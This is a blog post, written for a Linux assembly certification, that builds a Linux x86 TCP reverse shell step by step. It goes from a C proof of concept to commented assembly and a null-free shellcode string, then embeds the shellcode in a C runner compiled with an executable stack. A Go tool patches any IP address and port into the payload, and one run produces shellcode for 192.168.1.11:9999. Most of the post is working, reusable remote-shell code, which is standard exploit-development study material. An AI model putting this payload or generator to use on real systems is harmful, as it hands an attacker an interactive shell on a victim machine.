In the last post, I covered the walk through of bind shellcode in assembly. In this post, I will work on the same lines and will create a reverse shell in assembly.

The reference point will be same as earlier – analysis of the C reverse shell code, extract the information and then port it to assembly.

The aim of this post is somewhat similar to the last post. Specifically, the post will target the following:

  • Create a TCP reverse shell that spawns a shell over port 8443
  • Create a wrapper script to make the IP and port easily reconfigurable

I will jump right into the analysis of the C proof of concept and then work my way into the assembly code. If you want more insight on the approach, please refer to the my previous post which talked about the approach in a bit more detail.

As with the C code for bind shell, I found the C code for reverse shell too at https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/.

Analyzing the C proof of concept

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
 
int main(void)
{
 int sockfd; // socket file descriptor
 socklen_t socklen; // socket-length for new connections
 
 struct sockaddr_in addr; // client address
 
 addr.sin_family = AF_INET; // server socket type address family = internet protocol address
 addr.sin_port = htons( 1337 ); // connect-back port, converted to network byte order
 addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // connect-back ip , converted to network byte order
 
 // create new TCP socket
 sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
 
 // connect socket
 connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
 
 //  Duplicate file descriptors for STDIN, STDOUT and STDERR
 dup2(sockfd, 0);
 dup2(sockfd, 1);
 dup2(sockfd, 2);
 
 // spawn shell
 execve( "/bin/sh", NULL, NULL );
}

If you read the code, you will notice the difference between this and the C code for bind shell. In this, instead of binding a local port and listening for a connection using bind syscall, we are connecting to a remote system using connect syscall. The rest of the syscalls are same. So, this code can be broken down into the following:

  • Create a socket
  • Connect socket to remote system
  • Duplicate the file descriptors for STDIN, STDOUT and STDERR
  • Spawn the shell

Let’s look at each syscall and write the assembly code for it.

Create a socket

The first syscall is the same as bind shell. So, I have the same writeup as for bind shell.

The first step is to create a socket. The relevant C code snippet is below:

host_sockid = socket(PF_INET, SOCK_STREAM, 0); 

The C code tells us that the socket syscall needs to be invoked. A quick reference to the /usr/include/i386-linux-gnu/asm/unistd_32.h file reveals the syscall number of the socketcall syscall

#define __NR_socketcall 102

The sycall number associated with socketcall is 102. The man reference shows the parameters of this syscall:

int socketcall(int call, unsigned long *args);

We can reference the different function call of socketcall syscall in /usr/include/linux/net.h. Following snippet shows the syscalls we need to invoke for a TCP reverse shell. Please make a note as this will be referenced in later parts of the post too.

#ifndef _LINUX_NET_H
#define _LINUX_NET_H

#include <linux/socket.h>
#include <asm/socket.h>

#define NPROTO          AF_MAX

#define SYS_SOCKET      1               /* sys_socket(2)                */
#define SYS_BIND        2               /* sys_bind(2)                  */
#define SYS_CONNECT     3               /* sys_connect(2)               */
#define SYS_LISTEN      4               /* sys_listen(2)                */
#define SYS_ACCEPT      5               /* sys_accept(2)                */

As shown, to create a socket, the value of the call will be “1”. The args will then point to arguments of socket syscall.

SyscallArgumentMan referenceC code referenceValue
socketcallcallDetermines which socket function to invokeNA1
socketcallargsPoints to a block containing the actual argumentsNA<address of socket syscall arguments>

The man reference of the socket syscall is below:

int socket(int domain, int type, int protocol);

Let’s look at each argument and refer our proof of concept C code for values being passed in it.

SyscallArgumentMan referenceC code reference
socketdomainSpecifies a communication domain; this selects the protocol family which will be used for communicationPF_INET
sockettypeThe socket has the indicated type, which specifies the communication semanticsSOCK_STREAM
socketprotocolSpecifies a particular protocol to be used with the socket0

The value of domain can be found at/usr/include/i386-linux-gnu/bits/socket.h; which refers to the IPv4 family. PF_INET is a synonym for AF_INET.

#define PF_INET         2       /* IP protocol family.  */
#define AF_INET         PF_INET

The value of type can be found at/usr/include/i386-linux-gnu/bits/socket_type.h; which refers to connection oriented stream.

  SOCK_STREAM = 1,              /* Sequenced, reliable, connection-based byte streams.  */

The value of protocol can be found at/usr/include/linux/in.h; which refers to TCP protocol

IPPROTO_IP = 0, /* Dummy protocol for TCP */

The table below is updated with values of all arguments for socketcall syscall which calls socket syscall.

SyscallArgumentMan referenceC code referenceValue
socketcallcallDetermines which socket function to invokeNAEBX – 1
socketcallargsPoints to a block containing the actual argumentsNAECX – <address of arguments of socket syscall>
socketdomainSpecifies a communication domain; this selects the protocol family which will be used for communicationPF_INET2
sockettypeThe socket has the indicated type, which specifies the communication semanticsSOCK_STREAM1
socketprotocolSpecifies a particular protocol to be used with the socket00

As we have the all the data with us, we can now move forward to write the assembly code to create a socket.

global _start

section .text

_start:

; Creating a socket

        ; move decimal 102 in eax - socketcall syscall
        xor eax, eax
        mov al, 0x66    ;converted to hex

        ; set the call argument to 1 - SOCKET syscall
        xor ebx, ebx
        mov bl, 0x1

        ; push value of protocol, type and domain on stack - socket syscall
        ; int socket(int domain, int type, int protocol);
        ; arguments pushed in reverse order
        xor ecx, ecx
        push ecx        ; Protocol = 0
        push 0x1        ; Type = 1 (SOCK_STREAM)
        push 0x2        ; Domain = 2 (AF_INET)

        ; set value of ecx to point to top of stack - points to block of arguments for socketcall syscall
        mov ecx, esp

        int 0x80

This completes our first and important stage of the assembly program. We can now follow the same approach in evaluating other sycalls and writing the assembly code.

Connect socket to remote system

The relevant C code snippet for connect syscall is below:

// connect socket
 connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));

We will invoke connect syscall function from socketcall syscall. To bind the socket, the value of the call will be “3” (as referenced from net.h earlier). The args will then point to arguments of connect syscall.

The man reference of the connect syscall is below:

int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);

Let’s look at each argument and refer our proof of concept C code for values being passed in it.

SyscallArgumentMan referenceC code reference
socketcallcallDetermines which socket function to invokeNA
socketcallargsPoints to a block containing the actual argumentsNA
connectsockfdbind() assigns the address specified by addr to the
socket referred to by the file descriptor sockfd
sockfd
connectaddrbind() assigns the address specified by addr to the
socket referred to by the file descriptor sockfd
&addr
connectaddrlenaddrlen specifies the size, in bytes, of the address structure pointed to by addrsizeof(addr)

Notice that the connect syscall is exactly same as the bind syscall. The only difference is that instead of binding to the local IP and port, we will connect to remote IP and port. So, the structure of the sockaddr will be same as that we had in the bind syscall.

The first argument, which is sockfd, is nothing but the return value of previous syscall; which is a socket file descriptor returned by socket syscall.

The addr argument is same as that we had in the bind syscall and it points to sockaddr structure, which is defined as follows:

struct sockaddr_in {
   short int            sin_family;
   unsigned short int   sin_port;
   struct in_addr       sin_addr;
   unsigned char        sin_zero[8];
};

Let’s visualize this in a table with reference to our proof of concept C code:

Structure elementsDescriptionC reference
sin_familyRepresents an address familyAF_INET
sin_port16-bit port number in Network Byte Order1337
sin_addr32-bit IP address in Network Byte Order127.0.0.1
sin_zeroNot usedNA

As the address family is IPv4, the value of sin_family will PF_INET/AF_INET and the integer value will be same as that in previous syscall.

The value of sin_port in the C code is 1337. Let’ change this to 8443 in our shellcode. 8443 converts to 20FB in hex. To push it on the stack, we need to reverse it to 0xFB20; which is due to little endian format.

In the bind shell, we kept the value to sin_address to 0.0.0.0. However, in this case, we want our shell to connect back to a specific IP address. Let’s change this to the localhost IP for now, which is 127.0.0.1. The IP address is of 32 bits i.e. 4 bytes. So, in hex, 127.0.0.1 translates to 75 00 00 01. Reversing this to comply with little endian format, we need to push 0x0100007f on the stack.

The table below is updated with values of all arguments for socketcall syscall, which calls the accept syscall:

The last argument addrlen will be 16, which is the size of sockaddr_in structure.

SyscallArgumentMan referenceC code referenceValue
socketcallcallDetermines which socket function to invokeNAEBX – 3
socketcallargsPoints to a block containing the actual argumentsNAECX – <address of arguments of bind syscall>
connectsockfdbind() assigns the address specified by addr to the
socket referred to by the file descriptor sockfd
sockfdEDX – <return value from socket syscall>
connectaddrbind() assigns the address specified by addr to the
socket referred to by the file descriptor sockfd
&addrESI – <address of sockaddr_in struct>
connectaddrlenaddrlen specifies the size, in bytes, of the address structure pointed to by addrsizeof(addr)16

The values for sockaddr_in structure is also summarized below:

Structure elementsDescriptionC referenceValue
sin_familyRepresents an address familyAF_INET2
sin_family16-bit port number in Network Byte Order13370xFB20
sin_addr32-bit IP address in Network Byte Order127.0.0.10x0100007f
sin_zeroNot usedNANA

Using the above information, the following assembly code for connect syscall is created.

; Connect socket to remote system

        ; save return value of socket syscall - socket file descriptor
        xor edx, edx
        mov edx, eax

        ; move decimal 102 in eax - socketcall syscall
        mov al, 0x66    ;converted to hex

        ; set the call argument to 3 - connect syscall
        mov bl, 0x3

        ; push sockaddr structure on the stack
        ; struct sockaddr {
        ;       sa_family_t sa_family;
        ;       char        sa_data[14];
        ;       }
        xor ecx, ecx
        push 0x0100007f         ; s_addr = 127.0.0.1
        push word 0xfb20        ; port = 8443
        push word 0x2           ; family = AF_INET

        mov esi, esp            ; save address of sockaddr struct

        ; push values of addrlen, addr and sockfd on the stack
        ; bind(host_sockid, (struct sockaddr*) &addr, sizeof(addr));
        push 0x10               ; strlen =16
        push esi                ; address of sockaddr structure
        push edx                ; file descriptor returned from socket syscall

        ; set value of ecx to point to top of stack - points to block of arguments for bind syscall
        mov ecx, esp
        int 0x80

Redirect STDIN, STDOUT and STDERR via DUP2

For the reverse shell to be interactive and to actually work, like we did in the bind shell, we need to redirect the STDIN, STDOUT and STDERR to socket file descriptor created in previous syscall.

The relevant C code snippet for dup2 syscall is below:

//  Duplicate file descriptors for STDIN, STDOUT and STDERR
 dup2(sockfd, 0);
 dup2(sockfd, 1);
 dup2(sockfd, 2);

The man reference of dup2 syscall is below:

int dup2(int oldfd, int newfd);

The dup2 system call creates a copy of the file descriptor oldfd, using the file descriptor number specified in newfd. So, we will need to loop over dup2 call three times to map STDIN, STDOUT, STDERR to 0, 1 and 2 respectively.

SyscallArgumentMan referenceC code referenceValue
dup2oldfdfile descriptorsockfdEBX – <return value of socket syscall – socket file descriptor>
acceptnewfdfile descriptor0, 1 and 2 (three syscalls)0, 1 and 2 (three syscalls)

Using the above information, the following assembly code for dup2 syscalls is created.

; Duplicate file descriptors

        ; push arguments for dup2 syscall
        ; int dup2(int oldfd, int newfd);
        ; dup2 syscall - setting STDIN;
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        mov ebx, edx            ; move return value of sockfd (return value of socket syscall) in ebx
        xor ecx, ecx
        int 0x80

        ; dup2 syscall - setting STDOUT
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        mov cl, 0x1
        int 0x80

        ; dup2 syscall - setting STDERR
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        mov cl, 0x2
        int 0x80

Execute /bin/sh

This is the last part of our reverse shellcode, and it is exactly the same what we had in the bind shellcode. Once the client connects, we need to execute /bin/sh to spawn a shell. For this, we need execve syscall.

The relevant C code snippet for execve syscall is below:

// Execute /bin/sh 
execve("/bin/sh", NULL, NULL); 

The man reference of the execve syscall is below:

int execve(const char *pathname, char *const argv[], char *const envp[]);

The only part interesting for us is the pointer to pathname, which is the file which we want to execute. In our case, that is /bin/sh.

As “/bin/sh” is of 7 bytes, we can add an additional “/” to make it 8, which is easier for us to push on the stack. So, pathname will be “//bin/sh” (which is same as /bin/sh; adding “/” does not make a difference !)

As mentioned previously, “//bin/sh” will be pushed on the stack in reverse due to little endian format. Also, as we are dealing with filename/string, this has to be null terminated.

The final data looks like this:

SyscallArgumentMan referenceC code referenceValue
execve*pathnameExecve() executes the program referred to by pathname/bin/shhs/nib//0x00000000
execveargv[]Array of pointers to strings passed to the new program as its command-line argumentsNULL0
execveenvp[]Array of pointers to strings, conventionally of the form key=value, which are passed as the environment of the new programNULL0

Translating this to assembly, we have the following code:

; Execute /bin/sh

        ; exeve syscall
        mov al, 0xb

        ; int execve(const char *pathname, char *const argv[], char *const envp[]);
        ; push //bin/sh on stack
        xor ebx, ebx
        push ebx                ; Null
        push 0x68732f6e         ; hs/n : 68732f6e
        push 0x69622f2f         ; ib// : 69622f2f
        mov ebx, esp

        xor ecx, ecx
        xor edx, edx

        int 0x80

Here we go ! Our final shellcode is ready. Merging all the of the above, we get the following:

; Purpose:      Linux x86 Reverse Shell
; Author:       Mohit Suyal (@mosunit)
; Studen ID:    PA-16521
; Blog:         https://mosunit.com

global _start

section .text

global _start

section .text

_start:

; Creating a socket

        ; move decimal 102 in eax - socketcall syscall
        xor eax, eax
        mov al, 0x66    ;converted to hex

        ; set the call argument to 1 - SOCKET syscall
        xor ebx, ebx
        mov bl, 0x1

        ; push value of protocol, type and domain on stack - socket syscall
        ; int socket(int domain, int type, int protocol);
        ; arguments pushed in reverse order
        xor ecx, ecx
        push ecx        ; Protocol = 0
        push 0x1        ; Type = 1 (SOCK_STREAM)
        push 0x2        ; Domain = 2 (AF_INET)

        ; set value of ecx to point to top of stack - points to block of arguments for socketcall syscall
        mov ecx, esp

        int 0x80

; Connect socket to remote system

        ; save return value of socket syscall - socket file descriptor
        xor edx, edx
        mov edx, eax

        ; move decimal 102 in eax - socketcall syscall
        mov al, 0x66    ;converted to hex

        ; set the call argument to 3 - connect syscall
        mov bl, 0x3

        ; push sockaddr structure on the stack
        ; struct sockaddr {
        ;       sa_family_t sa_family;
        ;       char        sa_data[14];
        ;       }
        xor ecx, ecx
        push 0x0100007f         ; s_addr = 127.0.0.1
        push word 0xfb20        ; port = 8443
        push word 0x2           ; family = AF_INET

        mov esi, esp            ; save address of sockaddr struct

        ; push values of addrlen, addr and sockfd on the stack
        ; bind(host_sockid, (struct sockaddr*) &addr, sizeof(addr));
        push 0x10               ; strlen =16
        push esi                ; address of sockaddr structure
        push edx                ; file descriptor returned from socket syscall

        ; set value of ecx to point to top of stack - points to block of arguments for bind syscall
        mov ecx, esp
        int 0x80

; Duplicate file descriptors

        ; push arguments for dup2 syscall
        ; int dup2(int oldfd, int newfd);
        ; dup2 syscall - setting STDIN;
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        mov ebx, edx            ; move reture value of sockfd (return value of socket syscall) in ebx
        xor ecx, ecx
        int 0x80

        ; dup2 syscall - setting STDOUT
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        mov cl, 0x1
        int 0x80

        ; dup2 syscall - setting STDERR
        mov al, 0x3f            ; move decimal 63; coverted to hex - dup2 syscall
        mov cl, 0x2
        int 0x80


; Execute /bin/sh

        ; exeve syscall
        mov al, 0xb

        ; int execve(const char *pathname, char *const argv[], char *const envp[]);
        ; push //bin/sh on stack
        xor ebx, ebx
        push ebx                    ; Null
        push 0x68732f6e        ; hs/n : 68732f6e
        push 0x69622f2f         ; ib// : 69622f2f
        mov ebx, esp

        xor ecx, ecx
        xor edx, edx

        int 0x80

The next step is to assemble and link the the code.

root@kali:~/slae/assignments/assignment-2# nasm -f elf32 -o reverse_shell.o reverse_shell.nasm
root@kali:~/slae/assignments/assignment-2# ld -o reverse_shell_x86 reverse_shell.o
root@kali:~/slae/assignments/assignment-2# file reverse_shell_x86
reverse_shell_x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped

The ouput is an elf executable. We can extract the shellcode using the Commandlinefu

The output is a neat shellcode, which can be directly embedded in our shellcode tester program in C. Also, note that the shellcode is free from any null bytes.

root@kali:~/slae/assignments/assignment-2# objdump -d reverse_shell_x86 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xd2\x89\xc2\xb0\x66\xb3\x03\x31\xc9\x68\x7f\x00\x00\x01\x66\x68\x20\xfb\x66\x6a\x02\x89\xe6\x6a\x10\x56\x52\x89\xe1\xcd\x80\xb0\x3f\x89\xd3\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb0\x0b\x31\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xcd\x80"

Our C code looks like this once the shellcode is embedded:

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xd2\x89\xc2\xb0\x66\xb3\x03\x31\xc9\x68\x7f\x00\x00\x01\x66\x68\x20\xfb\x66\x6a\x02\x89\xe6\x6a\x10\x56\x52
\x89\xe1\xcd\x80\xb0\x3f\x89\xd3\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb0\x0b\x31\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xcd\x80"
;

main()

{
        printf("Shellcode length: %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
}

The final step is to compile this using gcc. We need to add fno-stack-protector to unprotect the stack and execstack to make the stack executable.

root@kali:~/slae/assignments/assignment-2# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
    7 | main()
      | ^~~~

The reverse shell is ready to be executed. To spawn a reverse shell, run netcat on local machine to listen on port 8443 Then, run the shellcode binary. Reverse shell spawned !!

Shellcode with reconfigurable IP and port

In the last post related to bind shell, I wrote a small code in Go which allowed to configure the port in the bind shell shellcode. In this case, as we are connecting to a remote host to spawn a shell, I have written a small script which allows the shellcode to be reconfigured with IP address and port; based on user’s input.

/*
Tool:		Linux Reverse Shell(x86) Port Configurator
Author:		Mohit Suyal (@mosunit)
Student ID:	PA-16521
Blog:		https://mosunit.com
*/

package main

import (
	"flag"
	"fmt"
	"os"
	"strconv"
	"strings"
)

func main() {

	//original shellcode
	shellcode := []string{`\x31`, `\xc0`, `\xb0`, `\x66`, `\x31`, `\xdb`, `\xb3`, `\x01`, `\x31`, `\xc9`, `\x51`, `\x6a`, `\x01`, `\x6a`, `\x02`, `\x89`, `\xe1`, `\xcd`, `\x80`, `\x31`, `\xd2`, `\x89`, `\xc2`, `\xb0`, `\x66`, `\xb3`, `\x03`, `\x31`, `\xc9`, `\x68`, `\x7f`, `\x00`, `\x00`, `\x01`, `\x66`, `\x68`, `\x20`, `\xfb`, `\x66`, `\x6a`, `\x02`, `\x89`, `\xe6`, `\x6a`, `\x10`, `\x56`, `\x52`, `\x89`, `\xe1`, `\xcd`, `\x80`, `\xb0`, `\x3f`, `\x89`, `\xd3`, `\x31`, `\xc9`, `\xcd`, `\x80`, `\xb0`, `\x3f`, `\xb1`, `\x01`, `\xcd`, `\x80`, `\xb0`, `\x3f`, `\xb1`, `\x02`, `\xcd`, `\x80`, `\xb0`, `\x0b`, `\x31`, `\xdb`, `\x53`, `\x68`, `\x6e`, `\x2f`, `\x73`, `\x68`, `\x68`, `\x2f`, `\x2f`, `\x62`, `\x69`, `\x89`, `\xe3`, `\x31`, `\xc9`, `\x31`, `\xd2`, `\xcd`, `\x80`}

	//Define flags for input
	ip := flag.String("ip", "", "remote IP to spawn shell")
	port := flag.Int("port", -1, "port number to spawn shell on")
	flag.Parse()

	if *port == -1 || *ip == "" {
		fmt.Println("Please input the port number. e.g. 9999 ")
		flag.PrintDefaults()
		os.Exit(1)
	}

	/*
		Code to change the IP address in the shellcode
	*/

	// split the ip address by octects into slice of strings
	ipslice := strings.Split(*ip, ".")

	v := make([]string, 4)

	// iterate over each slice element and convert into hex
	for i := range ipslice {

		// covert the element of string slice to an int
		s, _ := strconv.Atoi(ipslice[i])

		// Check if the hex coversion of slice element will be less than 2 digits; append an additional "0", if true
		if s < 16 {
			v[i] = fmt.Sprintf("%s%x", "\\x0", s)
			continue
		}
		v[i] = fmt.Sprintf("%s%x", "\\x", s)
	}

	// replace the relevant elements of slice to replace the old IP address with a new one
	for i := 0; i <= 3; i++ {
		shellcode[i+30] = v[i]
	}

	/*
		Code to change the port number in the shellcode
	*/

	// Code to change the IP address in the shellcode
	hexport := fmt.Sprintf("%x", *port)

	// Create a slice of strings to split the port into two parts
	one := make([]string, 4)
	two := make([]string, 4)

	// Create two seperate string slice to store first two and last two characters of the port converted in hex
	for i, r := range hexport {
		if i < 2 {
			one[i] = string(r)
			continue
		}
		two[i] = string(r)
	}

	// Join the string of ports to create two equal parts
	p1 := strings.Join(one[:], "")
	p2 := strings.Join(two[:], "")

	// Change the representation of the ports to hex format
	p1 = fmt.Sprintf("%s%s", "\\x", p1)
	p2 = fmt.Sprintf("%s%s", "\\x", p2)

	// Replace the respective values of port in orginal shellcode to new port provided
	shellcode[36] = p1
	shellcode[37] = p2

	// Join the slice of strings and print the shellcode
	fmt.Printf("Generating TCP reverse shellcode for IP address %v and port number %v\nThe shellcode length is %v bytes\n\n\"%s\"", *ip, *port, len(shellcode), strings.Join(shellcode[:], ""))

}

The code takes the IP address and port as input. The default shellcode spawned a shell on local system on port 8443. Let’s generate a new shellcode to spawn the reverse shell on 192.168.1.11 on port 9999

PS E:\<snipped>\SLAE\assignment-2> go run .\reverse_shell_config.go -ip 192.168.1.11 -port 9999
Generating TCP reverse shellcode for IP address 192.168.1.11 and port number 9999
The shellcode length is 94 bytes

"\x31\xc0\xb0\x66\x31\xdb\xb3\x01\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x31\xd2\x89\xc2\xb0\x66\xb3\x03\x31\xc9\x68\xc0\xa8\x01\x0b\x66\x68\x27\x0f\x66\x6a\x02\x89\xe6\x6a\x10\x56\x52\x89\xe1\xcd\x80\xb0\x3f\x89\xd3\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb0\x0b\x31\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xcd\x80"

Embedd this shellcode in our skeleton C program and execute it. The following output shows the reverse shell being spawned

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: https://www.pentesteracademy.com/course?id=3

Student ID: PA-16521

Thanks for reading !

2 Replies to “Creating Linux x86 reverse shell in Assembly”

  1. Hello would you mind sharing which blog platform you’re
    working with? I’m planning to start my own blog in the near future but I’m having a difficult
    time making a decision between BlogEngine/Wordpress/B2evolution and Drupal.
    The reason I ask is because your layout seems different then most
    blogs and I’m looking for something unique.
    P.S Sorry for getting off-topic but I had to ask! I couldn’t
    resist commenting. Perfectly written! Whoa! This
    blog looks just like my old one! It’s on a completely different
    topic but it has pretty much the same page layout and design.
    Wonderful choice of colors!

    1. Thanks, I did a bit of work on the appearance. Here are the details for you:
      1) Platform – WordPress
      2) Theme – MusicSong by ThemePalace
      3) Background color code – #11212d
      4) Font(using google font plugin) – Kanit
      Hope this helps !

Leave a Reply

Your email address will not be published.